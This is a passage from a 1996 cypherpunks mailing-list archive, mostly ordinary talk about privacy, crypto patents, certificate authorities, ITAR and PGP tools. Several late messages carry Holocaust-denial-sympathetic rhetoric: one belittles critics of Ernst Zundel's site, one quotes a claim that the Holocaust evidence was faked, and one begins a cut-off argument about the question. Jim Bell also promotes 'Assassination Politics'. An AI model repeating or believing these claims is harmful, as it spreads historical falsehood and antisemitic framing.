   desire for privacy, with stats from Yankelovich polls.

      The quandary here -- that regulations are both thought
      to be needed, yet anticipated to fail -- is the biggest
      issue, and one that puts additional pressure on the
      limits of cyberspace privacy. This crisis of confidence,
      as much as lawlessness itself, could easily choke the
      growth of cyberspace.


   YAN_kel


   Note: "Viewpoint" and "From the Desk Of" publishes readers'
   articles; submit by E-mail to <viewpts@nytimes.com> or to
   <fromdesk@nytimes.com>.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jan 1996 02:08:51 +0800
To: Rich Graves <jh@teleport.com>
Subject: Re: [NOISE] Re: NWLibs> Re: Anonymous trashing of Assassination Politics
Message-ID: <m0tgb3n-00090IC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:17 AM 1/28/96 -0800, Rich Graves wrote:

>On Sat, 27 Jan 1996, Jack Hammer wrote:
>
>> Here might be an interesting example of a snippet from a plot to commit 
>> criminal syndicalism.
>
>You know, I'm not really sure whether you're kidding, ignorant, cheering, 
>or warning. Frankly, I don't fucking care. You guys are all nuts. And I 
>should know -- ask Clark or AlanD.

I guess I should offer a partial apology, even though I'm not really 
responsible for this.  Jack Hammer is the on-air name for John Benneth, who 
is a local (to me, Portland, Oregon) "moderator" for a "advertised as 
controversial" radio talk call-in show.  He saw my Assassination Politics 
essay a few months ago, and for a few weeks just before the November sweeps 
Neilsen ratings period he was trying to bait me into calling in, thinking 
I'd be a sucker for a local audience. (He _needs_ controversy to be 
sucessful.)  Since then he gave up for a while, although he occasionally 
snipes at me.  I assume his interest will wax and wane as various ratings 
periods  come and go.


>I have saved Jim Bell's "Assassination Politics" essay, with his PGP 
>signature, and soon to be a lot of other things, at 
>
> http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/

Thank you.  I guess...

BTW, I sent the file to you as A16.???  That isn't a really descriptive
name.  Please change it to something more mnemonic, like ASPOL.TXT or something.


>I plan to collect as many off-the-wall conspiracy theories in this 
>directory as will fit in my disk quota. And when I run out of quota, I'll 
>raise it for myself.

Now, now, Rich, "Assassination Politics" is not a "conspiracy theory".  Or, 
at least, it's not your classic "conspiracy theory."  


>I think it's time the wacky right and wacky left started looking at each
>other's Web pages and lurking on each others' lists.

What about the wacky libertarians?  Why did you leave us out?!?  Waaaaaaahhhh!!!


> It's really funny
>putting two "Anarchist" pages, one featuring Che Guevara, the other
>featuring David Duke, side by side. Both say the guvment is out to get
>them;

I, on the other hand, am out to "get" the government.  But you'll be hearing 
more about that later.

Jim Bell

Klaatu Burada Nikto

"Something is going to  happen...             Something....Wonderful!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQu0VPqHVDBboB2dAQHfegP/W67SNQnzCL7TYdphdVmQ6wwWUjniUkz5
PJG/vJzQONFlsqLyz0o+jn0dZsMquoAWmB6jkrSzN6oAPoSnpAL5e5GPxk7busP+
Jmn56UCCFc6TUPlA69zqI5EA0uctcTGPunnLhNN/aEFTmngwQVmgC8o/eRB8NEyt
s2ImX/n6u0s=
=0YOC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 29 Jan 1996 01:01:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Escrowing Viewing and Reading Habits with the Government
In-Reply-To: <ad302c6f0002100460e2@[205.199.118.202]>
Message-ID: <960128.102805.1b2.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Klaus! writes:

> The "Library Awareness Program," administered by the Justice Department, is
> designed to identify potential criminals before they have a chance to
> commit their deeds. The visits to libraries made by the FBI are used to
> determine who is reading subversive or dangerous material.

Well, then, I s'pose I'm doomed.  I had Applied Cryptography out of the
library 5 times last year, and returned it overdue twice.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQukjmCl9Uka85MxAQHCEQf5AUHJVUy8qjkuEAS1pm8/V2hKhpZrbq/m
Y9dBalNyqXs3LIaFAv1Yehd/R5fxqJps2hMubCcr2Fb8ks3Yp20LdAeuMTMfoj7T
Hq6ZniKEXHI6H3tzIEobzS9uYrccW2DFbiRWQqxkz6E/gjxqKu6JuQ7/6ykiz4JT
S1Rd4VDdN4uGGl2Sw+C/EkRUcqyA2C5gcieHDb+pVN7Dc6A1ioqTVYZvnHEXyEsP
nZMd+E9cpYOIIFAwBcd4U1xQM+6Y1Dkmv06JBXye7whzn/P6zy9uAZlpIwa1uADZ
usAP/8LIHI5Qyzyd66DevMeLNAuF5Sbit5LEIZM3/2naM5MpT/JTig==
=THjm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <kbriggs@execpc.com>
Date: Mon, 29 Jan 1996 00:21:03 +0800
To: cypherpunks@toad.com
Subject: Re: SHA-2
Message-ID: <199601281605.LAA10612@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I think that has a bit to do with a question I had, whether it was SHA
>and SHA-1 (aka "Revised SHA") but I've found the revised version being
>referred to as "SHA-2" in a couple of sources and went with that....
>unless there *is* a third revision...?!?
>
>Problem is the memo I saw still referred to the revised algorithm as
>SHA.  (Anyone have a URL for FIPS 180-1 Please...?)
>
>Rob.
>

It is SHA-1.  Look for FIP180-1.TXT on NIST's BBS at (301)-948-5140.
I think they also have a web site but I don't have the URL (try Yahoo).

Kent


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQue3CoZzwIn1bdtAQFd3AGA0hJA7VvzmikZ8lC3ZPnkudPvpnivBi6e
sabfhN3DZXGYuhuOrHsEbYVmiTSfLPUK
=V5G8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 29 Jan 1996 01:28:22 +0800
To: tcmay@got.net (Timothy C. May)
Subject: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <ad302f3f010210040a20@[205.199.118.202]>
Message-ID: <9601281707.AA14081@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
 > "Deutsche Telekom, Germany's national phone company, blocked its 1 million
 > customers Thursday from gaining access to Internet "Web sites" maintained
 > by customers of Web Communications of Santa Cruz.

I have this urge to e-mail Deutche Telekom the output of an
appropriate AltaVista query so they can make sure none of that nasty
stuff is reaching impressionable German adults & children.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 02:08:40 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <ad30f66d040210049a3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:07 PM 1/28/96, Mike McNally wrote:
>Timothy C. May writes:
> > "Deutsche Telekom, Germany's national phone company, blocked its 1 million
> > customers Thursday from gaining access to Internet "Web sites" maintained
> > by customers of Web Communications of Santa Cruz.
>
>I have this urge to e-mail Deutche Telekom the output of an
>appropriate AltaVista query so they can make sure none of that nasty
>stuff is reaching impressionable German adults & children.

It's interesting that some of the first things to pop up with a AV search
of "Webcom AND Zundel" were instructions posted in one of German groups
about how to bypass the access restrictions...

[Actually, I just tried this search again, and didn't find the messages.
Maybe I am misremembering I did last night, or maybe....]

A Usenet message claims that Deutsche Bank is on the same Web server (?)
and cannot access some of its customers. Whatever the precise truth of
this, a side effect of countries trying to disconnect themselves from Bad
Thoughts is disruption of commerce. This may provoke a bigger reaction than
all of our protests and civil liberties points.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 29 Jan 1996 03:39:58 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199601281901.NAA06629@proust.suba.com>
Message-ID: <199601281919.LAA02350@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Morevover, although I don't think it's reasonable to expect Netscape to
> agree to include a non-existent CA in their browsers sight unseen, at the
> same time it doesn't seem smart to sink money into setting up the CA
> without some indication from Netscape that they're willing to give the
> idea good faith consideration. 
> 
	They won't. You're not a megacorp in bed with RSA.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 29 Jan 1996 03:44:56 +0800
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: your mail
In-Reply-To: <01BAEBF5.1492F480@loki>
Message-ID: <199601281921.LAA02698@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The second point make me wonder if NymServers are logal to use with my service (PSInet, Interramp)
> 

	That's forgery, not using a nym. You're likely safe.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 29 Jan 1996 01:26:12 +0800
To: cypherpunks@toad.com
Subject: Re: When do patents expire on Rabin's public key scheme?
In-Reply-To: <199601280538.VAA01588@mailx.best.com>
Message-ID: <Pine.LNX.3.91.960128113315.356A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 27 Jan 1996, James A. Donald wrote:

> When do patents expire on Rabin's public key scheme?
> 
> RSA claims that the Diffie Helman patent, which expires on the 29th of
> April, 1997, covers all public key cryptography.
> 

Actually, I think that the Merkle Hellman patent is the one considered to
cover all public key cryptography.  RSADSI claims that Diffie Hellman also
includes ElGamal, but Cylink now owns the Diffie Hellman patent and I don't
know if they consider it to also cover ElGamal.

> ElGamal and Rabin are unpatented.
> 
> Schmeier says that ElGamal will be free of patent restrictions after that,
> but he says nothing about Rabin.

In _Applied Cryptography_, there is no mention of any patents covering Rabin.
Elliptic curve public key encryption schemes are not covered by any public
key cryptography schemes, so it is possible that Rabin is also not covered
under any patents.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
PGP: Because sometimes, a _Captain Midnight_ decoder ring simply
isn't enough.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQum/rZc+sv5siulAQHNXgP/VlS2Q0zGtbZ4qhpWTb4BWdPAEDe+tq15
Ejh/2h/q0xMB0h560DjKAq9OmDLFpEBQf4rXprL5Y7rHeb0t6W7Rh2k9oS5rRlfu
wTJEuAMoRyQXwS32Zx2A9OvyPFHZWXMZNyXDI/Bq4F9QyQxzFpvCRd7pBJgHyS81
3efUT9RZ9vw=
=NJDk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 29 Jan 1996 04:14:44 +0800
To: cypherpunks@toad.com
Subject: The Unintended Consequences of Suppression
Message-ID: <199601281959.LAA16755@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


WARNING: This message contains Bad Thoughts.  The Surgeon General
         has determined that Bad Thoughts cause Critical Thinking,
         which may be illegal in Canada, Germany, and other
         countries too numerous to mention.

I just visited the Ernst Zundel Webcom page, which given the
number of server overload errors I experienced trying to browse
it, is now the Numero Uno Web Site on the entire Internet, thanks
to some anonymous and largely clueless official running
telecommunications services for the former Third Reich.

Like most sites run by "Infamous Holocaust Deniers", this one was
largely unimpressive, and would have garnered little attention
from anyone were it not for the noisy public villification
lavished upon it by its detractors.

After the furor this site is alleged to have percipitated, I
fully expected to see pictures of skinheads with explosives and
automatic weapons holding up pictures of Nazi atrocities and
libelous screeds blaming the Jews for all the misfortunes of
mankind.

You can imagine my surprise when I found only a few rather
simplistic historical questions, and that Mr. Zundel had even
included links to rebuttals of his points contained within the
Simon Wiesenthal Center's own Web Pages.

All of this might have gone completely unnoticed by the majority
of humankind, or have been the subject of dry boring debates at
occasional universities, were the topic not constantly dragged
into the public eye by stories about anti-free speech laws,
shrill cries by organizations like the SWC for censoring the
entire Internet, and officials who summarily unplug major chunks
of the Net and disrupt legitimate business while trying to stuff
a sock into the mouth of some individual whose views they find
embarrassing.

In doing this, the Speech Nazis, the Wiesenthalistas, and the
Clueless Bureaucrats have drawn more attention to the views of
people like Mr. Zundel than he ever could have on his own, and
have alienated many of the people who would cheerfully have
argued against Mr. Zundel on their behalf.  This goes beyond
simple stupidity, and clearly approaches the lobotomy level of
impaired mental functioning.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 29 Jan 1996 01:26:01 +0800
To: cypherpunks@toad.com
Subject: PAC_man
Message-ID: <199601281705.MAA02269@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-28-96. TWP:

   "Informant's Revelations on Cali Cartel Implicate Colombian
   Officials."

      Inside the counterintelligence center for notorious Cali
      drug lord Jose Santacruz Londono was an IBM AS/400
      computer storing coded information that listed thousands
      of bribes awarded by the Cali cartel to many individuals
      known collectively as "Caso 8000." The cartel's sysadmin
      has been decoding the computer's data and implicating
      officials from Colombian government, politics, the
      military and the entertainment industry.

      He later would be indicted as part of a major
      racketeering case brought by federal prosecutors in
      Miami against U.S. lawyers who allegedly have protected
      Cali interests here and abroad -- three private lawyers
      who are former federal prosecutors, including one who
      served as a high-ranking Justice Department official.

   PAC_man

   -----

   TWP has a followup on the AOL raid, mostly a police story
   grisler on the cyber-prowling horny-cats. Has ICU of the
   terminal logoff by a 13-year-old nerd. The fuz posted a
   call-in for anon tips:

      "You know how many we've gotten from our on-line hot
      line? Not one. It's like they have this fantastic world
      they operate in, and we are seen as intruders or
      something."

   ICU_ded












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Mon, 29 Jan 1996 03:14:40 +0800
To: Bruce Baugh <bruceab@teleport.com>
Subject: Re: PIDAHO and EUDORA PRO 2.2
Message-ID: <2.2.32.19960128184216.0068dfb8@midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:10 AM 1/28/96 -0800, bruceab@teleport.com wrote:
>At 09:17 PM 1/27/96 -0800, jdoe-0007@alpha.c2.org wrote:
>>In response to the "what has John Doe got that PIDAHO
>>doesn't" messages I tried to PIDAHO v2.6b.  I am unable
>>to make it work.  Messages from PIDAHO can not be sent to
>>the selected and OnLine EUDORA PRO application. 
>Um, yes, indeed they can. I do it routinely. Eudora Pro
>is one of the options in the drop-down list box in the
>E-mail|Transfer options... dialog, right below the buttons
>for canned settings. And it works just fine. You are
>making sure that you've got Eudora with a blank new
>message ready to go, right?

I'm using an essentially identical setup to jdoe-0007's
and I can't get it to work either.  It worked nicely under
Win31 and Eudora 2.1.2, but Win95 and Eudora 2.2(32) don't
play nice with Eudora.

It might be a bits thing (sixteen versus thirty-two)...

ObCrypto: Um, well, this note is PGP clearsigned?
(Seriously, this discussion ought to be Cc:ed to Joel, and/or
taken off the list.)

dave

- -----
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x961D2B09
Do not use old PGP keys 0xFF829C15 and 0x92732139.
http://www.midwest.net/scribers/dsmith/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQvCGDVTwUKWHSsJAQGWbQf9GPtB+VhubUDeBU56eYHJjPQmPfDRgJ6T
NApeChNNYv57GH5/E+V7wEVwaWyF+wTdSAYnQVCWMUozSZ02V+m4MdtXT6vUQpya
SSWt7h0BadOqbI+KR1gA1etGFC/kIHscRf2aGCUziHlpTe1nm7Hw9Kx/B1j9/Vc6
cFahN7wi+xohbRBJPYqsp/k1qNrDzuhySAW1+zNNSOPvxGQs5QrI9H5rIeL/L+iS
wri1sq0GVrktEGue838HGUDG2E6RaELAQe3OV0Y6nhee0KvHAcidK75d988zSP+i
DH7L6/nh/KC+72VwiuzoAsPy4PJvlLgmmiiWZYh1t1dtu97YGD1vKg==
=CKEw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William \"Bud\" Kennedy" <bkennedy@nb.net>
Date: Mon, 29 Jan 1996 01:55:06 +0800
To: cypherpunks@toad.com
Subject: hash trees and bank solvency
Message-ID: <Pine.3.89.9601281220.A26519-0100000@platinum.nb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am not so much worried about the bank stealing money out of my account as I 
am worried about them loaning to deadbeat countries to support some 
governmental idea of foreign policy.  Then, of course, there is always the 
possibility that they will loan it to some deadbeat country, not because of the 
government, but because of just outright stupidity.  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQu03QQo9ewScbyxAQE4HgP9GqMv8rs8PAEn16h8bZ0JHktAFm85EOr0
QI5BHqN2RYCpWzYpfE8aaD/4KgmKMJJQR2Ae0OSwBx6AY4CdgZlccr/ARn1a2vtN
5Wm7JQ2ymteWy5Jn0IocJkZkscX4q3WHp1Iuw8mhoT9+Y+0urOHHP+mH5YhDvj7R
CaHWHAcI+iY=
=U0jF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 29 Jan 1996 03:18:10 +0800
To: cypherpunks@toad.com
Subject: Netscape, CAs, and Verisign
Message-ID: <199601281901.NAA06629@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I'm a big fan of Netscape and their products, and I think they do a good 
job of addressing the interests of their customers and the public at 
large with respect to crypto issues.

But it's starting to become apparent that there's a fairly serious problem
with Certification Authorities and SSL.

The problem is simple enough:  sites with certificates from one of the CAs
that are preconfigured in Netscape have a tremendous advantage over sites
with certs from other CAs, and it's expensive and difficult to get a cert
if you're running an alternative server like ApacheSSL. 

This problem is going to get a lot worse when X509 client authentication 
becomes more popular.

Netscape needs to address the situation.  It's just not practical or
desireable for one company (Verisign) to have a stranglehold on
certificates. 

I'd like to see a less centralized CA that's tied into the existing system
of notaries.  The idea is to make it necessary to spoof a notary in order
to spoof the CA.  That won't make spoofing the CA impossible (nothing
will), but it will make spoofing the CA illegal. 

A notary could apply to the CA for the right to work as an agent, for a
nominal fee (<$100/year).  Only notaries could be agents.  If a person
wants a certificate, they'd come in and present ID and a key to the
notary/agent.  The person would have to present a form document stating
that he's requesting the cert.  The notary would stamp the form and affix
a signature to the key which would enable it to be processed automatically
by the CA. 

Fees for the whole procedure ought to be less than $30.  The CA ought to
operate off of the fees from the agents as a non-profit organization, and
the agents ought to keep the fees paid by the people requesting the
certificates.

Would any of the lawyers on the list be willing to comment on whether or
not it's possible or practical to tie a CA into the notary system?  Does
anyone have any thoughts as to how difficult/risky spoofing my CA is
compared to spoofing Netscape or Verisign? 

I could put up a server and I think I know a laywer who would help me set
up a non-profit organiation on a shoestring, but I don't want to do it if
the plan is impractical.  

Morevover, although I don't think it's reasonable to expect Netscape to
agree to include a non-existent CA in their browsers sight unseen, at the
same time it doesn't seem smart to sink money into setting up the CA
without some indication from Netscape that they're willing to give the
idea good faith consideration. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 29 Jan 1996 05:28:55 +0800
To: packrat@tartarus.uwa.edu.au
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <199601280510.NAA00268@ratbox.rattus.uwa.edu.au>
Message-ID: <199601282104.NAA10926@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>In message <199601262011.MAA17408@netcom16.netcom.com>, 
>  "Vladimir Z. Nuri" wrote:
>> 
>> has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
>> would happen? the gubbermint blindly thinks that cyberspace will 
>> inevitably bring the wrath of four horsemen of the infocalypse, but aren't we
>> equally as comic in assuming that violating the ITAR crypto sections
>> will inevitably bring the 4 horsemen of the NSA??
>
>One word...
>
>Zimmerman.
>
>I do agree with what you're saying though.

One word...

Zimmermann.

Zimmermann supports my contention, as I wrote in the post. NOTHING
happened to him. it is conceivable this same result could have
been arrived at (government drops investigation) if he never even 
hired a lawyer.

Zimmermann is a perfect example of what may be counterproductive
hysteria on *our* side, toward advancing crypto. if Zimmermann
cannot be prosecuted, and is not prosecuted, where are the ITAR "teeth"???

sure, endless people can argue with me. "nasty things will befall you
if you violate crypto sections of the ITAR". they will back these
example up with the same baseless fear that schoolchildren reverently refer
to Cooties or the Bogeyman.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Sun, 28 Jan 1996 19:20:26 +0800
To: cypherpunks@toad.com
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <199601262011.MAA17408@netcom16.netcom.com>
Message-ID: <199601280510.NAA00268@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <199601262011.MAA17408@netcom16.netcom.com>, 
  "Vladimir Z. Nuri" wrote:
> 
> has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
> would happen? the gubbermint blindly thinks that cyberspace will 
> inevitably bring the wrath of four horsemen of the infocalypse, but aren't we
> equally as comic in assuming that violating the ITAR crypto sections
> will inevitably bring the 4 horsemen of the NSA??

One word...

Zimmerman.

I do agree with what you're saying though.

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 29 Jan 1996 02:48:56 +0800
To: cypherpunks@toad.com
Subject: The Politics of Mistrust
Message-ID: <199601281831.NAA23410@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post initiates today a 6-part series on the
   loss of trust in all American institutions, "The Politics
   of Mistrust," based on a recent poll sponsored by the 
   Post, Harvard and the Kaiser Family Foundation.

   While not directly related to technical crypto, a number 
   of findings parallel discussions here about the diminution
   of personal and economic security. Samples:

      America is becoming a nation of suspicious strangers,
      and this mistrust of each other is a major reason
      Americans have lost confidence in the federal government
      and virtually every other major national institution.
      Every generation that has come of age since the 1950s
      has been more mistrusting of human nature, a
      transformation in the national outlook that has deeply
      corroded the nation's social and political life.

      Mistrustful Americans repeatedly expressed far less
      confidence in the federal government, the military, the
      Supreme Court, Congress and the Clinton administration
      than the dwindling numbers of Americans who were more
      upbeat about human nature.

      Fear of crime, economic insecurity and pessimism about
      the lives of future generations all have separately
      added to the belief that government is either making
      things worse or is incapable of making them better.

      Today, a clear majority of respondents in their early
      20s said they do not trust their fellow Americans, a view
      they share with one in four Americans over the age of
      60. "It's like living in the cave man age," said a 29-
      year-old. "Nobody cares anymore. Nobody cares. They will
      no sooner run you down and run away than to spit in your
      face."

      An environment in which a majority of Americans believe
      that most people can't be trusted breeds attitudes that
      hold all politicians as corrupt, venal and self-serving,
      and government action is doomed to failure.

      Wages have stagnated, workers change jobs frequently and
      downsizing corporations offer little protection even to
      the most loyal of employees.

      Americans who feel most pessimistic about the economy
      also are more likely to see the government as a threat.

   Harvard and Kaiser are to separately publish their own
   analysis of the poll.

   The first article offers much more detail and is quite
   long, about a page and a half. Perhaps someone might offer
   a site where this and others in the series could be made
   available as they appear. If so, send me a note.















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 29 Jan 1996 05:51:00 +0800
To: "Vladimir Z. Nuri" <packrat@tartarus.uwa.edu.au
Subject: Re: more RANTING about NSA-friendly cpunks
Message-ID: <199601282130.NAA29294@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:04 PM 1/28/96 -0800, Vladimir Z. Nuri wrote:
>Zimmermann supports my contention, as I wrote in the post. NOTHING
>happened to him. it is conceivable this same result could have
>been arrived at (government drops investigation) if he never even 
>hired a lawyer.
>
>Zimmermann is a perfect example of what may be counterproductive
>hysteria on *our* side, toward advancing crypto. if Zimmermann
>cannot be prosecuted, and is not prosecuted, where are the ITAR "teeth"???

I am not a lawyer, but I suspect that the proscuters gave up because they
could not build a trail of evidence between Zimmermann and the actual
export.  After all, Zimmermann only wrote PGP.  He didn't post it on the
net.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jan 1996 05:54:56 +0800
To: "Rev. Ben" <cypherpunks@toad.com>
Subject: Re: Denning's misleading statements
Message-ID: <2.2.32.19960128214014.0091a098@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:12 PM 1/28/96 -0500, Rev. Ben wrote:
>On Sun, 28 Jan 1996, Peter Wayner wrote:
>
>> I believe that David Gelerntner, the professor of computer
>> science at Yale University injured by a UNABOMBER bomb, is also
>> a supporter of the Clipper chip. This may or may not be
>> something that arose from the bombing. But I'm not sure how many
>> cavaets and things he adds to his position. He may have changed
>> it. But then he's not exactly a cryptographer.
>
>There's quite a few folks in the Yale CS department that are pro-Clipper
>or fence sitters.  They justify it in class by claiming that law
>enforcement needs these abilities if LE is to remain effective. 

I wonder if the same justifications were used for the Inquisition.  "We have
to use these methods in order for the Church to remain effective."

Currently we have a whole host of laws that are difficult, if not impossible
to enforce.  The response from law enforcement is that we have to use
stronger and stronger enforcement methods to shore up laws that are by their
nature unenforcable.  How they expect to do this and remain in a non-police
state is beyond me.

I expect that such enforcement methods will be sold to us the same way that
they sell us soap and presidents.  The media will give us plenty of
"reasons" as to why we have to accept draconian methods to resolve problems
from undefined enemies.  Already we get the "real life" cop shows showing us
a whole host of "enemies" who need to be hauled off to jail and the news
programs showing us the scare story of the moment. Expect the four horsemen
to get closer and closer as the shacles are ready to be put into place.

Such enforcement is self-defeating in the long run.  It is based off the
false perception that the governed cannot recognise that these laws are
unenforcable. Continued enforcement of "unenforcable" laws increases the
disrespect for laws in general. ("The imposition of order equals the
escalation of disorder.")

The question is when the bulk of the population will see what is being
prepared for them...  Probibly after it is too late.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 29 Jan 1996 06:25:44 +0800
To: cypherpunks@toad.com
Subject: Re: The Big Lie
In-Reply-To: <ad311df817021004e4bb@[205.199.118.202]>
Message-ID: <199601282156.NAA09063@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > But if it really happened, why are so many countries trying
 > to suppress the evidence that it was all just a CIA-Mossad
 > plot? It seems more likely that the pictures were faked, or
 > were pictures taken of dying Germans in Russian POW camps on
 > the Eastern Front.

Since "Holocaust" is an Operational Definition referencing Jewish
experience during the Second World War, there is a clearly
tautological aspect to the oft-posed question "Did the Holocaust
happen?", to which the answer is obviously, a priori, and
identically, "Yes", in the sense that Jews did, indeed, live
during the Second World War, and some of them did indeed, like
numerous other minority religous, ethnic, and political groups,
have experiences which would not be described as recreational in
nature.

Armed with a question whose answer is true by construction, it is
not very hard to correctly characterize those arguing that the
answer is "false" as crackpots, and only a tiny leap from there
